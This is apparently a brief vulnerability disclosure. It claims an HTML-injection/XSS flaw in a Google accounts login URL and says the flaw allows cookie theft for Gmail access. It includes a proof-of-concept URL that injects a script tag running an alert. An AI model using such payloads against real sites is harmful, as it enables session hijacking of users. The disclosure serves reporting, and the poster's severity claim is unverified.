<div>There is a html injection vulnerability in <a href="https://www.google.com">https://www.google.com</a>.</div>
<div>It&nbsp;&nbsp;is very critical,you can get the cookie to login into gmail ore other service.</div>
<div>&nbsp;</div>
<div>POC:<a href="https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;1-=1" target="_blank">
https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;1-=1
</a></div>
<div>&nbsp;</div>
<div>More:<a href="http://xss2root.blogspot.com/">http://xss2root.blogspot.com/</a></div>